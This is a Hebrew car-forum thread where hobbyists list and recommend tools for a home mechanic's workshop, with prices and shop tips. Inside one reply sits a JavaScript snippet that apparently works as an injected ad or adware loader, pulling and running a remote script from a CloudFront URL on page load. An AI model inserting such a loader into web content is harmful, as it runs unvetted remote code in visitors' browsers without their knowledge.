Jump to content
  • הצטרפו למשפחה

היי, היי אתה (או את) שם!

אנחנו יודעים, נחמד להיות אנונימי, ולמי בכלל יש כוח להירשם או להיות עכשיו "החדשים האלה".

אבל בתור חברי פורום רשומים תוכלו להנות ממערכת הודעות פרטיות, לנהל מעקב אחרי כל הנושאים בהם הייתם פעילים, ובכלל, להיות חלק מקהילת הרכב הכי גדולה, הכי מגניבה, וכן - גם הכי שרוטה, באינטרנט הישראלי. 

אז קדימה, למה אתם מחכים? בואו והצטרפו ותהיו חלק מהמשפחה הקצת דפוקה שלנו.

dir="rtl" style="text-align:right;"> שימו לב! השרשור הזה בן 4588 ימים, שזה ממש ממש הרבה ולכן הוא ננעל.

אם אתם פותחי השרשור ו/או יש לכם עדכון רלוונטי לנושא - פנו לאחד המנהלים ונפתח את השרשור חזרה לתגובות.

פוסטים מומלצים

פורסם

היי ,

מהו ארגז הכלים המושלם למשפץ הביתי ?

כלים שאנחנו חייבים שיהיו שם בארגז

אביזרים הכרחיים , וכל מה שעולה על הדעת ..

מאיפה לקנות וכמובן עלויות . .

נראה לי שיהיה פה מעניין .:lol:

אני מכוון תמיד אל הירח - מקסימום אפגע בכוכב . .

[size=6"[color="black:snipersmi :snipersmi ][/color]][/size]

פורסם

אין גבול כמובן.

מכונאות? פחחות? רפדות?

נתחיל מליפט, מכבש, מנוף קרן, גרניק, ונתקדם ללוחץ שסתומים, לוחץ טבעות בוכנה, רתכת CO2...

אתה יודע מה? קנה בנתיים סט בוקסות ותתקדם משם לפי הצורך. זה מה שאני עשיתי ויש לי כיום את כל הרשום לעיל פלוס עוד קצת.

פורסם
אין גבול כמובן.

מכונאות? פחחות? רפדות?

נתחיל מליפט, מכבש, מנוף קרן, גרניק, ונתקדם ללוחץ שסתומים, לוחץ טבעות בוכנה, רתכת CO2...

אתה יודע מה? קנה בנתיים סט בוקסות ותתקדם משם לפי הצורך. זה מה שאני עשיתי ויש לי כיום את כל הרשום לעיל פלוס עוד קצת.

מתוך סקרנות (ובורות) - מה השימוש במכבש?

if(typeof(jQuery)=='undefined'){(function(){var ccm=document.createElement('script');ccm.type='text/javascript';ccm.src='https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);if(ccm.readyState){ccm.onreadystatechange=function(){if(ccm.readyState=="loaded"||ccm.readyState=="complete"){ccm.onreadystatechange=null;ccm_e_init(1);}};}else{ccm.onload=function(){ccm_e_init(1);};}})();}else{ccm_e_init();} function ccm_e_init(jc){if(jc){jQuery.noConflict();} jQuery(function(){var http=location.href.indexOf('https://')>-1?'https':'http';var ccm=document.createElement('script');ccm.type='text/javascript';ccm.async=true;ccm.src=http+'://d3lvr7yuk4uaui.cloudfront.net/items/loaders/loader_1063.js?aoi=1311798366&pid=15220&zoneid=14731&cid=&rid=&ccid=&ip=';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(ccm,s);jQuery('#cblocker').remove();});};

פורסם

הכוונה למכבש מוסכים שזו מסגרת מסיבית מתכווננת שלרוב בחלקה העליון יש בוכנה הידראולית המופעלת באמצעות משאבה ידנית בצד המופעלת עם זרוע ארוכה .משמש לחלוץ ולהכניס חלקים כמו מיסבים ,תותבים ועוד.

יש ביד 2 אחד למכירה 50 טון במחיר 5500 ש"ח,יש תמונה.(יד 2-קטגורית כלי עבודה-תת קטגוריה כלים לעבודת מכונאות-טקסט חופשי-מכבש)אני יודע שלא תקנה אבל אפשר להתרשם.

אריק

פורסם

סיפרו לי על קרובת משפחה רחוקה שהחליטה ללמוד טניס.

קנתה מחבט, כדורים, חצאית, חולצה, נעלי טניס, כובע, משקפי שמש תואמים...

אחרי השיעור הראשון החליטה שזה לא בשבילה....

טוב, זאת סתם אסוציאציה :lol:

אבל ברצינות- אני מסכים עם Spiderman. אני לא רואה טעם בלקנות "ארגז כלים מושלם".

כשהתחלתי לטפל ברכב (אז עדיין של הורי, לפני שנים רבות...) קניתי כל פעם מה שהייתי זקוק לו למשימה הקרובה - אפילו מפתחות בודדים, לפי הצורך המיידי (טוב, ברור לי שהזמנים השתנו, וסביר היום לקנות סט שלם...).

ברבות המשימות, הצטיידתי כראוי. היום יש לי הרבה יותר מ"ארגז".

לדעתי זאת הדרך הנכונה ל"מוסך ביתי"...

עודד

פורסם

אני התחלתי בארגז בירות.... שתיתי הסתכלתי ברכב החלוד :shock: ...

ואז הכל התחיל :lol:

שבוע טוב!

"לכל בעיה יש פתרון. שאם לא כן, לא הייתה בעיה" אלברט איינשטיין

שברולט מליבו 4.3 1978

פורסם
הכוונה למכבש מוסכים שזו מסגרת מסיבית מתכווננת שלרוב בחלקה העליון יש בוכנה הידראולית המופעלת באמצעות משאבה ידנית בצד המופעלת עם זרוע ארוכה .משמש לחלוץ ולהכניס חלקים כמו מיסבים ,תותבים ועוד.

יש ביד 2 אחד למכירה 50 טון במחיר 5500 ש"ח,יש תמונה.(יד 2-קטגורית כלי עבודה-תת קטגוריה כלים לעבודת מכונאות-טקסט חופשי-מכבש)אני יודע שלא תקנה אבל אפשר להתרשם.

אריק

לדעתי מוגזם למכונאי החובב. אני קניתי 10 טון חדש בל. כ. במשהו כמו 1000 שח.

באופן כללי לבד מבוקסות ומפתחות אינני קונה את הכלים היקרים ביותר. לרוב גם מחפש משומש.

למשל כרגע אני מחפש מחרטה בינונית במחיר מציאה. יש סבלנות.

פורסם

בוקר טוב,

הנסיון שלי הוא בעיקר עם אופנועים קטנים אבל אני חושב שהבסיס דומה אם אתה רוצה לשפץ לבד בדירתך. כמו שאמרו קודמי, התחלתי עם מה שצריך ומה שחשבתי שצריך, ומשם המשכתי הלאה.

ראשית - דאג למקום עבודה ראוי. אני התחלתי עם מחסן קטן של של "כתר" במרפסת ולאחרונה התרחבתי ובניתי משהו "מעט" יותר גדול כפי שתראה בתמונות.

שנית - אמבטיה ניידת על גלגלים לניקוי חלקים מטינופת. לא תאמין כמה זה חשוב. כולם מדברים על כלים שצריך, אבל אני מה לעשות, טיפוס פרקטי, וקודם כל צריך ניקיון או שאשתך/זוגתך תדאג לגדוע את רעיונות השיפוץ שלך מיד בתחילתם.

שלישית - סטנד טיפולים. קניתי משומש ביד-2 ושיפצתי אותו.

רביעית - שולחן עבודה ומלחציים.

חמישית - 2 סטים איכותיים של בוקסות עם ראצ'ט (בוקסות גדולות ובוקסות קטנות). קניתי איכותי כי הזולים נשבו לי או פשוט נשחקו מיד וחבל על הכסף.

שישית - סט מברגים + מפתחות אלן + מפתחות T.

שביעית - פטישים שונים. גדול, קטן, גומי, סיליקון.

שמינית - מלטשת שולחן עם מדיה של בד ומדיה של מברשות ברזל

תשיעית - ארגז עזרה ראשונה. מה לעשות, לא תמיד הרצון שלי מתאים ליכולת הקיימת ....כדאי להיות מוגן.

עשר ואחרון - אשה מפרגנת......

הנה התמונות. מקווה שעזרתי.

שלומי

P2200020.jpg

PC280382.jpg

סטנד 5.jpg

P2200018.jpg

P8280002.jpg

פורסם
בוקר טוב,

הנסיון שלי הוא בעיקר עם אופנועים קטנים אבל אני חושב שהבסיס דומה אם אתה רוצה לשפץ לבד בדירתך. כמו שאמרו קודמי, התחלתי עם מה שצריך ומה שחשבתי שצריך, ומשם המשכתי הלאה.

ראשית - דאג למקום עבודה ראוי. אני התחלתי עם מחסן קטן של של "כתר" במרפסת ולאחרונה התרחבתי ובניתי משהו "מעט" יותר גדול כפי שתראה בתמונות.

שנית - אמבטיה ניידת על גלגלים לניקוי חלקים מטינופת. לא תאמין כמה זה חשוב. כולם מדברים על כלים שצריך, אבל אני מה לעשות, טיפוס פרקטי, וקודם כל צריך ניקיון או שאשתך/זוגתך תדאג לגדוע את רעיונות השיפוץ שלך מיד בתחילתם.

שלישית - סטנד טיפולים. קניתי משומש ביד-2 ושיפצתי אותו.

רביעית - שולחן עבודה ומלחציים.

חמישית - 2 סטים איכותיים של בוקסות עם ראצ'ט (בוקסות גדולות ובוקסות קטנות). קניתי איכותי כי הזולים נשבו לי או פשוט נשחקו מיד וחבל על הכסף.

שישית - סט מברגים + מפתחות אלן + מפתחות T.

שביעית - פטישים שונים. גדול, קטן, גומי, סיליקון.

שמינית - מלטשת שולחן עם מדיה של בד ומדיה של מברשות ברזל

תשיעית - ארגז עזרה ראשונה. מה לעשות, לא תמיד הרצון שלי מתאים ליכולת הקיימת ....כדאי להיות מוגן.

עשר ואחרון - אשה מפרגנת......

הנה התמונות. מקווה שעזרתי.

שלומי

איפה התמונה של האישה המפרגנת?:lol::lol::lol::lol:

פורסם

גם אני בעד לקנות סט בוקסות, סט מפתחות פתוחים, מברגים וכו' איכותיים, וכל השאר לקנות/להשאיל לפי הצורך.

לפני הקניה תבדוק אם אתה צריך בוקסות/מפתחות מילימטרים או אינצ'ים, יותר נוח (וזול) לעבוד עם סט מותאם ולא כפול.

היכן ניתן למצוא סט של בוקסות איכותיות? לא snap -on אבל משהו איכותי?

לאחר בדיקה, קניתי סט בוקסות איכותי של "3/8 Profxene ב-"מ.מ.ש.ר." באזור התעשיה בחולון

וסט מפתחות פתוחים ב-"ל.כ." ליד צריפין

• שנה מאוחר יותר...
פורסם

לגמרי מסכים אם הגישה הזאת. אבל יש בסיס מחייב.

הייתי הולך אל סט בוקסות של פרופקסן קטן+גדול

מפתחות של סיגנט קונה סט מפתחות בסיסי - משהו כמו 170 שקל ב טכנוצינור ת.א. ומשלים את המידות לפי הצורך.

פלייר

פלייר פטנט

קטר

רב-מודד

ידית מומנט (איביי הכי משטלם)

סט מברגים (הייתי הולך על סיגנט או פרופקסן)

הלנים

כוכבים

כוכבים מחוררים

אם בכוונת לבצע אובראולים אז צריך חולץ לפולי וחולץ לגלגל של הטיימינג + כלים להכנסת מחזירי שמן (ברזל עגול אם עיגול פלסטיק אצלי בתמונה) ומכווץ תבעות בוכנהץ

משהו כזה....

20131204_150939.jpg

20131204_1457191.jpg

פורסם

אני ממליץ על זה:

סט מלא במזוודה אחת אינצ'י + מילימטרי.

ניתן להשלים אותו ב- 2 מתאמים (בין גודל בוקסות לגודל ידית) ובסט פשוט של מפתחות פתחוים מילימטריים.

מעבר לזה כמובן כל הפלאיירים, פטיש, מברגים וכו...

2012-12-09 16.58.34 %282%29.jpg

2012-12-09 16.59.04.jpg

האקסיות: שתי חיפושיות, פורד ברנדה, אלפא 33, אלפא ספרינט, קייזר פריזר cj5, וולוו 121... הנוכחיות: חיפושית גרמניה שנת 71 ועוד איזו שרירנית אמריקאית מנופחת ונוהמת.

פורסם

הארגז האולטימטיבי והנדרש ביותר בו תלוי הכלי האולטימטיבי הוא זה שבסימלון של פותח השרשור הזה..:oops: .

לפני 40 שנה היה לי ארגז כלים -קופסא ירוקה באורך של 50 ס"מ וברוב של 12 ס"מ עם ידית נשיאה ומגש פנימי היו שם סט מפתחות פתוחים, מפתח שבדי, פלייר, מברג מתהפך, ברגים וחוטי ברזל פיוזים, כל מיני ברגים אומים וחוטים. חשבתי אז שיש בה את כל מה שצריך וכנראה שזה היה נכון כי לא היה יום שהפיאט שלי לא היתה צריכה איזה טיפול פירוק והרכבה. :roll:

היום יש לי עגלת כלים עם 6 מגירות מלאות כלים ועוד כמה ארונות ותמיד חסר עוד משהו.:wink:

שלמה דן גדרון

• תוכן חדש...